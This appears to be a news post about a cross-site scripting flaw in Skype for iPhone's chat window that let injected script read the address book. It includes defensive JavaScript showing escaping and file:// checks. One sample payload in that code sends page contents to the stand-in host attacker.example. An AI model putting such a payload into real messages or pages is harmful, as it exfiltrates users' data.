If you use Skype for iPhone, either remove it for now or stop using it until a fix ships: a cross-site scripting vulnerability has been disclosed in the “Chat Message” window of version 3.0.1 and earlier.

The flaw lets an attacker plant malicious JavaScript that executes when the recipient views a chat message. In the researcher’s demonstration the script reads the victim’s information, including the address book, and uploads it to a web server (see the video below).

Here’s what the researcher who found the vulnerability had to say:

Executing arbitrary JavaScript code is one thing, but I found that Skype also improperly defines the URI scheme used by the built-in WebKit browser for Skype. Usually you will see the scheme set to something like “about:blank” or “skype-randomtoken”, but in this case it is actually set to “file://”. This gives an attacker access to the user’s file system, and an attacker can access any file that the application itself would be able to access.

File system access is partially mitigated by the iOS application sandbox that Apple has implemented, preventing an attacker from accessing certain sensitive files. However, every iOS application has access to the user’s AddressBook, and Skype is no exception.
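As an added illustration (not code from the original post, and not Skype’s own code): a minimal JavaScript model of how a chat message rendered into an embedded WebKit view becomes stored XSS, together with the two fixes the quoted analysis points at, escaping untrusted text before it enters the markup and refusing to load the view with a “file://” base URL. The payload, the sender name and the rendering functions are constructed for the example; the base-URL check assumes the view is handed a document plus a base URL, as UIWebView’s loadHTMLString:baseURL: does.

```javascript
// Constructed sample: an attacker-controlled chat message carrying markup.
// Any HTML the renderer does not neutralise is parsed as part of the page.
const ATTACKER_MESSAGE =
  'hi <script>new Image().src="http://attacker.example/?d=" +' +
  ' encodeURIComponent(document.documentElement.outerHTML)</script>';

// Vulnerable renderer: the message is concatenated straight into the markup,
// so the <script> element above executes when the chat window is displayed.
function renderMessageUnsafe(sender, text) {
  return `<div class="msg"><b>${sender}</b>: ${text}</div>`;
}

// Escape the five characters that let text break out of an HTML text node
// or a quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened renderer: every untrusted field is escaped before interpolation.
function renderMessageSafe(sender, text) {
  return `<div class="msg"><b>${escapeHtml(sender)}</b>: ${escapeHtml(text)}</div>`;
}

// Wrap rendered messages in a document whose CSP forbids inline script and
// all remote loads, so a single missed escape still cannot run or exfiltrate.
function wrapDocument(bodyHtml) {
  return [
    '<!DOCTYPE html><html><head>',
    '<meta http-equiv="Content-Security-Policy" content="default-src \'none\'">',
    '</head><body>', bodyHtml, '</body></html>',
  ].join('');
}

// Crude detector used here only to show the difference between the two
// renderers: does the output still contain a live <script> start tag?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Second layer from the quoted analysis: the base URL given to the WebView
// fixes the origin the rendered page runs in. A file:// base lets injected
// script read whatever files the app itself can read, so refuse it before
// loading. Unparseable input is treated as "not a file URL" here; a real
// loader should reject that too.
function baseUrlGrantsFileAccess(baseUrl) {
  try {
    return new URL(baseUrl).protocol === 'file:';
  } catch (e) {
    return false;
  }
}

// Assumed loader wrapper: only ever hand the view escaped content and a
// non-file base URL (hypothetical helper, not an iOS API).
function buildChatDocument(sender, text, baseUrl) {
  if (baseUrlGrantsFileAccess(baseUrl)) {
    throw new Error('refusing to render chat with a file:// base URL');
  }
  return wrapDocument(renderMessageSafe(sender, text));
}

console.log('unsafe:', renderMessageUnsafe('mallory', ATTACKER_MESSAGE));
console.log('safe:  ', renderMessageSafe('mallory', ATTACKER_MESSAGE));
console.log('file:// base rejected:', baseUrlGrantsFileAccess('file://'));
```

The escaping fix is the one that closes the reported hole; the base-URL check addresses the second point in the quote, because even a payload that slips through escaping cannot read local files if the document was never given a file:// origin.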

Skype also told TechCrunch that it is aware of the issue and is working on a fix:

“We are working hard to fix this reported issue in our next planned release which we hope to roll out imminently. In the meantime we always recommend people exercise caution in only accepting friend requests from people they know and practice common sense internet security as always.”

The video below shows the attack in action:

Let’s hope the fix comes soon. Until then you can subscribe to our RSS feed, follow us on Twitter, or become a fan on our Facebook page; we will keep you updated as the story develops.